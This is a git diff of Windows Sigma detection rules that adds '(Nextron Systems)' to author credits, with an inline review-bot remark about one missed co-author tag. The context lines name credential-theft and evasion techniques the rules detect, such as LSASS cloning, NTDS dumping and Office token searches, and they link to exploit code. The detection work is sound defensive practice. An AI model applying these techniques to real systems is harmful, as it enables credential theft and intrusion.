@@ -7,7 +7,7 @@ references:
 - https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses
 - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/
 - https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md
-author: Florian Roth, Tim Shelton
+author: Florian Roth (Nextron Systems), Tim Shelton
 date: 2019/01/16
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml b/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml
index d3268e191..84912f313 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml
@@ -2,7 +2,7 @@ title: Execution in Webserver Root Folder
 id: 35efb964-e6a5-47ad-bbcd-19661854018d
 status: test
 description: Detects a suspicious program execution in a web service root folder (filter out false positives)
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/01/16
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml b/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml
index 865f402ea..2da7f1ef3 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml
@@ -9,7 +9,7 @@ references:
 - https://twitter.com/bohops/status/1276357235954909188?s=12
 - https://twitter.com/nas_bench/status/1535322450858233858
 - https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/
-author: 'Florian Roth, Nasreddine Bencherchali, @gott_cyber'
+author: 'Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber'
 date: 2019/06/29
 modified: 2022/09/20
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml b/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml
index 553fdde68..789647d77 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks
 references:
 - https://twitter.com/ORCA6665/status/1496478087244095491
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/23
 modified: 2022/04/21
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml
index 679e9fff9..5fe2612ea 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml
@@ -6,7 +6,7 @@ references:
 - https://twitter.com/bigmacjpg/status/1349727699863011328?s=12
 - https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/
 - http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt
-author: Florian Roth, omkar72, oscd.community
+author: Florian Roth (Nextron Systems), omkar72, oscd.community
 date: 2021/02/24
 modified: 2022/08/16
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_format.yml b/rules/windows/process_creation/proc_creation_win_susp_format.yml
index 9eb000f31..273884d23 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_format.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_format.yml
@@ -5,7 +5,7 @@ description: Detects the execution of format.com with a suspicious filesystem se
 references:
 - https://twitter.com/0gtweet/status/1477925112561209344
 - https://twitter.com/wdormann/status/1478011052130459653?s=20
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/04
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_susp_git_clone.yml b/rules/windows/process_creation/proc_creation_win_susp_git_clone.yml
index 3ecf4adfe..65f53c7fc 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_git_clone.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_git_clone.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
 references:
 - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/03
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_guid_task_name.yml b/rules/windows/process_creation/proc_creation_win_susp_guid_task_name.yml
index 5ab145042..0bb89521f 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_guid_task_name.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_guid_task_name.yml
@@ -5,7 +5,7 @@ description: Detects creation of a scheduled task with a GUID like name
 references:
 - https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/
 - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/31
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_susp_gup.yml b/rules/windows/process_creation/proc_creation_win_susp_gup.yml
index 9bde95f1a..61ee08673 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_gup.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_gup.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
 references:
 - https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/02/06
 modified: 2022/08/13
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml b/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml
index 1e4429250..5e45b0ac6 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.
 references:
 - https://twitter.com/nas_bench/status/1535322182863179776
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/10
 tags:
 - attack.command_and_control
diff --git a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml
index c3dfb1d8b..36dca49c7 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of the Notepad++ updater (gup) to launch other commands or executables
 references:
 - https://twitter.com/nas_bench/status/1535322445439180803
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/10
 modified: 2022/09/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_iis_module_registration.yml b/rules/windows/process_creation/proc_creation_win_susp_iis_module_registration.yml
index 9c57e1170..1a36b1f82 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_iis_module_registration.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_iis_module_registration.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors
 references:
 - https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/
-author: Florian Roth (rule), Microsoft (idea)
+author: Florian Roth (Nextron Systems), Microsoft (idea)
 date: 2022/08/04
 modified: 2023/01/23
 logsource:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml b/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml
index fa68132c9..2c7bd965b 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)
 references:
 - https://pentestlaboratories.com/2021/12/08/process-ghosting/
-author: Max Altgelt
+author: Max Altgelt (Nextron Systems)
 date: 2021/12/09
 modified: 2022/12/14
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml b/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml
index 40517c79d..df1d7650b 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location
 references:
 - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/02
 modified: 2022/09/13
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml b/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml
index 9ad243c85..b3f9821b9 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml
@@ -6,7 +6,7 @@ references:
 - https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/
 - https://twitter.com/Hexacorn/status/1420053502554951689
 - https://twitter.com/SBousseaden/status/1464566846594691073?s=20
-author: Florian Roth, Samir Bousseaden
+author: Florian Roth (Nextron Systems), Samir Bousseaden
 date: 2021/11/27
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_manageengine_pattern.yml b/rules/windows/process_creation/proc_creation_win_susp_manageengine_pattern.yml
index f9e074546..da9dc0996 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_manageengine_pattern.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_manageengine_pattern.yml
@@ -6,7 +6,7 @@ references:
 - https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/
 - https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py
 - https://blog.viettelcybersecurity.com/saml-show-stopper/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2023/01/18
 modified: 2023/01/21
 logsource:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml b/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml
index dd939d1c5..ba886f9b9 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml
@@ -7,7 +7,7 @@ description: |
 references:
 - https://twitter.com/cyb3rops/status/1562072617552678912
 - https://ss64.com/nt/cmd.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/08/23
 modified: 2022/11/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml
index c468a83ee..b63b8bfda 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml
@@ -9,7 +9,7 @@ references:
 - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
 - https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml
 - https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/12
 modified: 2022/09/13
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml b/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml
index 58e79822e..17a60ad9c 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml
@@ -5,7 +5,7 @@ description: Detects a certain command line flag combination used by mpiexec.exe
 references:
 - https://twitter.com/mrd0x/status/1465058133303246867
 - https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/11
 modified: 2022/03/04
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml b/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml
index e1b1d23e4..1977da4f9 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml
@@ -6,7 +6,7 @@ references:
 - https://en.wikipedia.org/wiki/HTML_Application
 - https://www.echotrail.io/insights/search/mshta.exe
 - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/07/17
 modified: 2022/11/07
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_mshtml_runhtmlapplication.yml b/rules/windows/process_creation/proc_creation_win_susp_mshtml_runhtmlapplication.yml
index c173f7391..29dfaf6d1 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_mshtml_runhtmlapplication.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_mshtml_runhtmlapplication.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects suspicious command line using the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)
 references:
 - https://twitter.com/n1nj4sec/status/1421190238081277959
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/14
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml b/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml
index 9f44f3b67..089593502 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects execution of msiexec from an uncommon directory
 references:
 - https://twitter.com/200_okay_/status/1194765831911215104
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/11/14
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml b/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml
index 682990032..9c6b54d10 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects suspicious msiexec process starts with web addresses as parameter
 references:
 - https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/02/09
 modified: 2022/01/07
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_net_use.yml b/rules/windows/process_creation/proc_creation_win_susp_net_use.yml
index 85ceaa4ff..734806c6c 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_net_use.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_net_use.yml
@@ -5,7 +5,7 @@ description: Detects net use command combo which executes files from WebDAV serv
 references:
 - https://twitter.com/ShadowChasing1/status/1552595370961944576
 - https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior
-author: pH-T
+author: pH-T (Nextron Systems)
 date: 2022/09/01
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_susp_netsupport_rat_exec_location.yml b/rules/windows/process_creation/proc_creation_win_susp_netsupport_rat_exec_location.yml
index 0af8e5e0b..a5cd14550 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_netsupport_rat_exec_location.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_netsupport_rat_exec_location.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of client32.exe (NetSupport RAT) from an unsual location (outisde of 'C:\Program Files')
 references:
 - https://redcanary.com/blog/misbehaving-rats/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/19
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_susp_new_kernel_driver_via_sc.yml b/rules/windows/process_creation/proc_creation_win_susp_new_kernel_driver_via_sc.yml
index 42edc3efa..71065e449 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_new_kernel_driver_via_sc.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_new_kernel_driver_via_sc.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects creation of a new service (kernel driver) with the type "kernel"
 references:
 - https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/14
 modified: 2022/08/08
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml b/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml
index 600468e2c..6c1c909bb 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml
@@ -8,7 +8,7 @@ description: Detects creation of a new service via "sc" command or the powershel
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md
 - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/14
 modified: 2022/11/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml b/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml
index c6cbee48c..be4acb8e6 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml
@@ -12,7 +12,7 @@ references:
 - https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/
 - https://twitter.com/xorJosh/status/1598646907802451969
 - https://www.softwaretestinghelp.com/how-to-use-ngrok/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/05/14
 modified: 2022/12/02
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml b/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml
index 2752e56b0..0e54a93fc 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)
 references:
 - https://pentestlaboratories.com/2021/12/08/process-ghosting/
-author: Max Altgelt
+author: Max Altgelt (Nextron Systems)
 date: 2021/12/09
 modified: 2023/01/25
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml b/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml
index e396281b9..8012176a4 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection
 references:
 - https://www.x86matthew.com/view_post?id=ntdll_pipe
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/05
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntds.yml b/rules/windows/process_creation/proc_creation_win_susp_ntds.yml
index 5fba45831..8f7356f2c 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_ntds.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_ntds.yml
@@ -10,7 +10,7 @@ references:
 - https://github.com/zcgonvh/NTDSDumpEx
 - https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1
 - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/11
 modified: 2022/11/10
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml
index 6619facd3..9697758aa 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml
@@ -8,7 +8,7 @@ description: Detects execution of ntdsutil.exe to perform different actions such
 references:
 - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)
 - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/14
 tags:
 - attack.credential_access
diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml b/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml
index 4713f9807..abb3095c1 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml
@@ -5,7 +5,7 @@ description: Detects a privilege elevation attempt by coercing NTLM authenticati
 references:
 - https://twitter.com/med0x2e/status/1520402518685200384
 - https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml
-author: Elastic (idea), Tobias Michalski
+author: Elastic (idea), Tobias Michalski (Nextron Systems)
 date: 2022/05/04
 modified: 2022/12/02
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml b/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml
index 17454b5c1..741384f66 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects possible search for office tokens via CLI by looking for the string "eyJ0eX". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.
 references:
 - https://mrd0x.com/stealing-tokens-from-office-applications/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/25
 tags:
 - attack.credential_access
diff --git a/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml b/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml
index 732245022..be17b11b8 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml
@@ -2,7 +2,7 @@ title: Execution in Outlook Temp Folder
 id: a018fdc3-46a3-44e5-9afb-2cd4af1d4b39
 status: test
 description: Detects a suspicious program execution in Outlook temp folder
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/10/01
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_parents.yml b/rules/windows/process_creation/proc_creation_win_susp_parents.yml
index ad929aa3c..4591730e4 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_parents.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_parents.yml
@@ -5,7 +5,7 @@ description: Detects suspicious parent processes that should not have any childr
 references:
 - https://twitter.com/x86matthew/status/1505476263464607744?s=12
 - https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/21
 modified: 2022/09/08
 logsource:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml b/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml
index a84539737..94b8b71d4 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml
@@ -6,7 +6,7 @@ references:
 - http://www.xuetr.com/
 - https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/
 - https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/
-author: Florian Roth, Nasreddine Bencherchali
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
 date: 2022/10/10
 modified: 2022/12/30
 logsource:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml b/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml
index 646fece0c..1a0e4d894 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml
@@ -5,7 +5,7 @@ description: Detects a ping command that uses a hex encoded IP address
 references:
 - https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna
 - https://twitter.com/vysecurity/status/977198418354491392
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/03/23
 modified: 2022/01/07
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml b/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml
index 6c95412af..aeeface9d 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml
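Review bot: The new author line in proc_creation_win_susp_pchunter.yml tags only Florian Roth, leaving Nasreddine Bencherchali untagged even though every other rule in this commit that credits him (e.g. proc_creation_win_susp_gup_download.yml) now reads `Nasreddine Bencherchali (Nextron Systems)`. If the omission is not deliberate, the line should read `+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)`. Leaving a co-author untagged appears intended elsewhere for people outside Nextron such as Samir Bousseaden or Tim Shelton, so only this one case looks like an oversight.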
@@ -5,7 +5,7 @@ description: Detects suspicious Plink tunnel port forwarding to a local port
 references:
 - https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/
 - https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/01/19
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_plink_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_plink_usage.yml
index d0f426164..10827a725 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_plink_usage.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_plink_usage.yml
@@ -7,7 +7,7 @@ status: test
 description: Execution of plink to perform data exfiltration and tunneling
 references:
 - https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/08/04
 modified: 2023/01/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_base64_encoded_cmd.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_base64_encoded_cmd.yml
index 01e273662..2c5181df2 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_powershell_base64_encoded_cmd.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_base64_encoded_cmd.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
 references:
 - https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e
-author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
+author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
 date: 2018/09/03
 modified: 2021/03/02
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml
index 6ec1ffd49..5e1824a34 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious ways to download files or content using PowerShell
 references:
 - https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/24
 modified: 2023/01/05
 logsource:
